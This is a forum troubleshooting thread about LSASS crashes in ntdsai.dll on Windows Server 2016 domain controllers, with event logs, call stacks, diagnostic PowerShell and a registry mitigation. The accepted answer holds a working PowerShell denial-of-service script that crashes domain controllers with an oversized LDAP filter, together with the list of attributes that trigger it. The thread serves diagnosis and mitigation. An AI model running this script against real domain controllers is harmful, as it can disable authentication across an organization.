LSASS crashes on Windows Server 2016

keymax147 21 Reputation points
2022-08-15T16:15:50.993+00:00

Hi All!

Over the last few days we ran into a problem with our domain controllers (DCs).
Synopsis:
Within 4 minutes, 9 DCs went down with the same error: lsass faulted in ntdsai.dll with exception code 0xc00000fd.

Log Name: Application
Source: Application Error
Date: xxxxxxxxx
Event ID: 1000
Task Category: Application Crashing Events
Level: Error
Keywords: Classic
User: N/A
Computer: computer1
Description:
Faulting application name: lsass.exe, version: 10.0.14393.4704, time stamp: 0x615be0cd
Faulting module name: ntdsai.dll, version: 10.0.14393.4946, time stamp: 0x61f82f6c
Exception code: 0xc00000fd
Fault offset: 0x000000000011b537
Faulting process id: 0x368
Faulting application start time: 0x01d846d02ab1ed09
Faulting application path: C:\Windows\system32\lsass.exe
Faulting module path: C:\Windows\system32\ntdsai.dll
Report Id: 191428d8-85b7-4537-b82d-38d76e90a3a8
Faulting package full name:
Faulting package-relative application ID:
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Application Error" />
<EventID Qualifiers="0">1000</EventID>
<Level>2</Level>
<Task>100</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="xxxxxxxxxxxxxx" />
<EventRecordID>409660</EventRecordID>
<Channel>Application</Channel>
<Computer> computer1</Computer>
<Security />
</System>
<EventData>
<Data>lsass.exe</Data>
<Data>10.0.14393.4704</Data>
<Data>615be0cd</Data>
<Data>ntdsai.dll</Data>
<Data>10.0.14393.4946</Data>
<Data>61f82f6c</Data>
<Data>c00000fd</Data>
<Data>000000000011b537</Data>
<Data>368</Data>
<Data>01d846d02ab1ed09</Data>
<Data>C:\Windows\system32\lsass.exe</Data>
<Data>C:\Windows\system32\ntdsai.dll</Data>
<Data>191428d8-85b7-4537-b82d-38d76e90a3a8</Data>
<Data>
</Data>
<Data>
</Data>
</EventData>
</Event>

Each fault led to a reboot of the affected server.
Six of these DCs run on bare-metal servers and three on VMs. All VMs are on different VMware clusters. The VM-based DCs rebooted 2-3 times within this period.
Each bare-metal and VM server has 128 GB of memory (no more than 35% utilized) and 20 CPU cores (no more than 40% utilized). Disk latency, queues, etc. are normal.
The servers are also split between two datacenters (4 in one and 5 in the other).
All servers have lsass.exe version 10.0.14393.4704 and ntdsai.dll version 10.0.14393.4946.
The only factor common to all these servers is that they are published in one NS record in DNS.
We captured a trace of lsass.
Call stack for lsass.exe:

Child-SP RetAddr Call Site

00 000001b020b7c578 00007fff896df73f ntdsai!_chkstk+0x37
01 000001b020b7c590 00007fff896df6ac ntdsai!StrCatBufferLen+0x87
02 000001b020b7c5f0 00007fff897b4f56 ntdsai!StrCatBuffer+0x1c
03 000001b020b7c620 00007fff896df08a ntdsai!ValueCatBuffer+0x12a
04 000001b020b7c700 00007fff896df1cf ntdsai!dbCreateSearchPerfLogFilterInt+0x1a6
05 000001b020b7c7a0 00007fff896df1cf ntdsai!dbCreateSearchPerfLogFilterInt+0x2eb
06 000001b020b7c840 00007fff896dea5b ntdsai!dbCreateSearchPerfLogFilterInt+0x2eb
07 000001b020b7c8e0 00007fff8986804f ntdsai!DBCreateSearchPerfLogData+0x7b
08 000001b020b7c9c0 00007fff8967737c ntdsai!DBGenerateLogOfSearchOperation+0x47
09 000001b020b7ca20 00007fff89674613 ntdsai!FindFirstSearchObject+0x40c
0a 000001b020b7cb50 00007fff89676348 ntdsai!LocalSearch+0x1483
0b 000001b020b7d970 00007fff8967c49d ntdsai!SearchBody+0x98
0c 000001b020b7d9b0 00007fff896c0319 ntdsai!DirSearchNative+0x125
0d 000001b020b7dce0 00007fff896bad27 ntdsai!LDAP_CONN::SearchRequest+0xbe9
0e 000001b020b7e340 00007fff896bca53 ntdsai!LDAP_CONN::ProcessRequestEx+0x1ca7
0f 000001b020b7f100 00007fff896b8d1e ntdsai!LDAP_CONN::IoCompletion+0x8f3
10 000001b020b7f910 00007fff89a825c9 ntdsai!LdapCompletionRoutine+0x14e
11 000001b020b7f980 00007fff89a822e4 ntdsatq!AtqpProcessContext+0xd9
12 000001b020b7f9e0 00007fff8e0b84d4 ntdsatq!AtqPoolThread+0x194
13 000001b020b7fa70 00007fff8e4e1791 kernel32!BaseThreadInitThunk+0x14
14 000001b020b7faa0 0000000000000000 ntdll!RtlUserThreadStart+0x21

231183-photo-2022-08-15-184135.jpeg

231184-photo-2022-08-15-184442.jpeg

231198-photo-2022-08-15-190741.jpeg

From our point of view, the key functions are LDAP_CONN::SearchRequest and DBGenerateLogOfSearchOperation.

By the way, these DCs have Field Engineering diagnostic logging enabled to monitor slow LDAP requests: under the registry key HKLM\System\CurrentControlSet\Services\NTDS\Diagnostics, the value "15 Field Engineering" is set to 0x00000005.
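To check which DCs actually have this logging level set, something like the following could be used. It is only a sketch: it assumes the ActiveDirectory module is installed and that PowerShell remoting is enabled to every DC, neither of which is stated in the post.

```powershell
# Sketch: report the "15 Field Engineering" level on every DC in the domain.
# Assumptions: ActiveDirectory module available, PS remoting enabled to each DC.
Import-Module ActiveDirectory

$dcNames = (Get-ADDomainController -Filter *).HostName

Invoke-Command -ComputerName $dcNames -ScriptBlock {
    $diagKey   = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics'
    $valueName = '15 Field Engineering'
    # Return the level as an object; remoting adds PSComputerName automatically.
    [pscustomobject]@{
        Level = Get-ItemPropertyValue -Path $diagKey -Name $valueName
    }
} | Select-Object PSComputerName, Level | Sort-Object PSComputerName
```

A level of 5 on a DC means the setting described above is in effect there.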

We also see that _chkstk tried to allocate 2601872 bytes of memory, but the PE headers of lsass.exe show a limit of 512 KB. So it looks like _chkstk may have a bug, but this is still unclear to us since we are not Windows developers.
Bottom line: we think LSASS crashed while logging an event in DBGenerateLogOfSearchOperation, which is directly linked to LDAP_CONN::SearchRequest.
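For scale, the two numbers above can be compared directly. This is a rough sketch that assumes the 512 KB figure refers to the stack reserve of the crashing thread. Exception code 0xc00000fd is a stack overflow, and frames 04-06 of the call stack show dbCreateSearchPerfLogFilterInt calling itself.

```powershell
# Compare the allocation reported for _chkstk with the limit quoted from the PE header.
$requestedBytes = 2601872   # allocation size reported in the post
$stackLimit     = 512KB     # limit quoted in the post (assumed to be the stack reserve)

'{0:N0} bytes requested vs {1:N0} bytes available ({2:N1}x)' -f `
    $requestedBytes, $stackLimit, ($requestedBytes / $stackLimit)
```

The request is roughly five times the quoted limit. That would be enough to explain a stack overflow even if _chkstk itself behaves correctly.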

Questions and comments are very welcome, as we are still not sure about the future reliability of this domain. Has anyone run into the same problem? We have not managed to find any similar problem or bug via Google.

By the way, we have examined the possibility of malicious activity as well.
We found two vulnerabilities: https://www.rapid7.com/db/vulnerabilities/msft-cve-2022-26831/ and https://nvd.nist.gov/vuln/detail/CVE-2022-26919
Both were fixed at the end of April 2022.


Accepted answer
  1. Elvis P 96 Reputation points
    2022-09-19T21:15:52.487+00:00

    tag @keymax147

    Hi KeyMax147-9529,

    It sounds like it could be related to the issue. However, MS says it's not. They won't confirm if it even has a CVE.

    Setting "15 Field Engineering" to 0 stops the problem but does leave you without 1644 events. If you are a large organization, this sucks. If you want to test in your own lab, here you go. It's pretty simple once you know the problem. Don't use this script for evil unless someone really deserves it ;)

    $lDAPServer = "myservername.mydomain.tld:3268"
    $attribute = "legacyExchangeDN"

    $padding = "Nullam non nisi est sit amet."
    $lDAPSearchClause = "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua."
    $strBuilder = [System.Text.StringBuilder]::new()
    # 2016 iterations + padding.
    for ($i = 0; $i -lt 2016; $i++) {
        [void]$strBuilder.Append($lDAPSearchClause)
    }
    $lDAPFilter = $("({0}={1}{2})" -f $attribute,$padding,$strBuilder.ToString())

    Write-Host $attribute -ForegroundColor Yellow
    Write-Host $("Will Crash at ~ 247,883. Filter Length: {0}" -f ([System.Text.Encoding]::UTF8.GetByteCount($lDAPFilter))) -ForegroundColor Green
    Get-ADObject -Server $lDAPServer -LDAPFilter $lDAPFilter -SearchBase "" -SearchScope Subtree -Properties samaccountname

    <#
    Note: If you have not been running "15 Field Engineering" at 5, or have set it back to 0 to prevent denial of service,
    it may take some time for your DC to get into a state where this occurs. The above script should work right away.
    Change the string builder iterations from 2016 to make the filter larger or smaller.

    Additional testing: loop through the confirmed attribute list below and/or wrap the entire script in its own 500-count for loop.

    Affects attributes with:

    oMSyntax 20 and 127
    attributeSyntax 2.5.5.4 and 2.5.5.1

    attribute must also be published in GC:
    (isMemberOfPartialAttributeSet=TRUE)

    Confirmed attributes:

    legacyExchangeDN
    mSSMSCapabilities
    mSMQLabel
    member
    objectCategory

    #>

    1 person found this answer helpful.

6 additional answers

  1. Elvis P 96 Reputation points
    2022-08-26T01:54:19.77+00:00

    Set "15 Field Engineering" in the registry from 5 to 0. This is an undisclosed bug that is actually reproducible with a domain user account and 13 lines of PowerShell.

    HKLM\System\CurrentControlSet\Services\NTDS\Diagnostics\15 Field Engineering
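    A minimal sketch of that change, run locally on a DC in an elevated PowerShell session. The variable names are illustrative only.

    ```powershell
    # Set "15 Field Engineering" to 0 on the local DC and show the value before and after.
    $diagKey   = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics'
    $valueName = '15 Field Engineering'

    $before = Get-ItemPropertyValue -Path $diagKey -Name $valueName
    Set-ItemProperty -Path $diagKey -Name $valueName -Value 0 -Type DWord
    $after  = Get-ItemPropertyValue -Path $diagKey -Name $valueName

    '{0}: {1} -> {2}' -f $valueName, $before, $after
    ```

    The same value can be set back to 5 later if the logging is needed again.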

    1 person found this answer helpful.

  2. Elvis P 96 Reputation points
    2022-08-30T05:30:42.663+00:00

    Tag @Skycat

    MS started taking our case more seriously when I was able to reproduce on demand with a very short and simple PowerShell. They are actively working on a hot fix.

    I don't want to disclose too much at this time, as it can easily be used as a denial of service. I responded to this so anyone encountering this issue can stop it and get MS to acknowledge the issue. I don't think this issue has been published widely internally at MS.

    With that said, it is an LDAP search processing failure with the filter driver used in 15 Field Engineering when it is set to 5. This is the bit that logs 1644 events. This is also why the offending query is not logged in Directory Services. The dump trace shows ntdsai.dll faulting with an LDAP OPERATIONS ERROR. This should be passed back to the client. Unfortunately, the 15 Field Engineering hook is passing faulty address info, causing lsass to crash. This is why you see lsass mostly throwing a 0xc0000005 (memory access failure) with ntdsai.dll as the faulting module. The ntdsa and ntdsai DLLs are the DSA (directory service agent).

    Based on my testing, the following criteria must be met for the problem to manifest on a 2016, 2019, and likely 2022 DC.

    1. 15 Field Engineering must be set to 5 (set to 0 for mitigation).
    2. A particular format used in an LDAP filter.
    3. Applies to one level or subtree search only. Base searches are not affected.
    4. Works against full directory or global catalog.
    5. Based on my testing, the filter must be against an attribute of oMSyntax 20 or 127, and the attribute has to be published in the GC.
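
    To see which attributes in a given forest match criterion 5, the schema can be queried along these lines. This is a sketch that assumes the ActiveDirectory module is available. It lists candidates only and does not show that every listed attribute triggers the crash.

    ```powershell
    # List schema attributes with oMSyntax 20 or 127 that are published in the GC.
    # Assumption: ActiveDirectory module installed; run as any user who can read the schema.
    Import-Module ActiveDirectory

    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $filter   = '(&(objectClass=attributeSchema)' +
                '(isMemberOfPartialAttributeSet=TRUE)' +
                '(|(oMSyntax=20)(oMSyntax=127)))'

    Get-ADObject -SearchBase $schemaNC -LDAPFilter $filter `
                 -Properties lDAPDisplayName, oMSyntax, attributeSyntax |
        Sort-Object lDAPDisplayName |
        Select-Object lDAPDisplayName, oMSyntax, attributeSyntax
    ```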
    1 person found this answer helpful.

  3. Elvis P 96 Reputation points
    2022-08-31T13:40:20.027+00:00

    tag @keymax147

    Hi KeyMax147-9529,

    Error 0xc0000005 was the most common that I saw when reviewing logs. I did see a few one-off errors. Error 0xc00000fd is a stack overflow, https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/debugging-a-stack-overflow. I could see this problem causing a stack overflow. The common thread is lsass crashing with ntdsai module being the faulting module.
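
    To review which exception codes a DC has logged, the Application Error events can be summarized as below. This is a sketch. The property indexes follow the order of the Data elements in the Event ID 1000 XML from the original post: 0 is the application, 3 the faulting module, 6 the exception code.

    ```powershell
    # Summarize lsass.exe crash events (Event ID 1000) from the local Application log.
    $events = Get-WinEvent -FilterHashtable @{
        LogName      = 'Application'
        ProviderName = 'Application Error'
        Id           = 1000
    } -ErrorAction SilentlyContinue

    $events |
        Where-Object { $_.Properties[0].Value -eq 'lsass.exe' } |
        Select-Object TimeCreated,
            @{ Name = 'Module';        Expression = { $_.Properties[3].Value } },
            @{ Name = 'ExceptionCode'; Expression = { $_.Properties[6].Value } }
    ```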

    I don't want to release the code publicly right now, since MS quit jerking us around and is actively working on a hotfix. To my knowledge, I am the only one to have reproduced the problem. I wouldn't want the script getting around. It would be like signing my name to it. I did tell MS and my employer that I would release it if MS starts jerking us around again.

    I more or less responded to this thread so you and others would have a fix if impacted by this. People are being impacted. I know of someone who has had more than a score of DCs go down at once.

    I will eventually publish the script here.

    1 person found this answer helpful.

  4. Gary Reynolds 9,391 Reputation points
    2022-08-15T17:58:06.397+00:00

    Hi,

    I'm not sure I have much to add and you might need to log a call with Microsoft but a couple of questions.

    Are all the DCs the same OS version?
    What patches have been installed in the last few days?
    If you build new DCs with the same or a different OS version, do they have the same problem?
    Have you run a semantic database check?
    Do dcdiag and repadmin show any errors?

    Gary.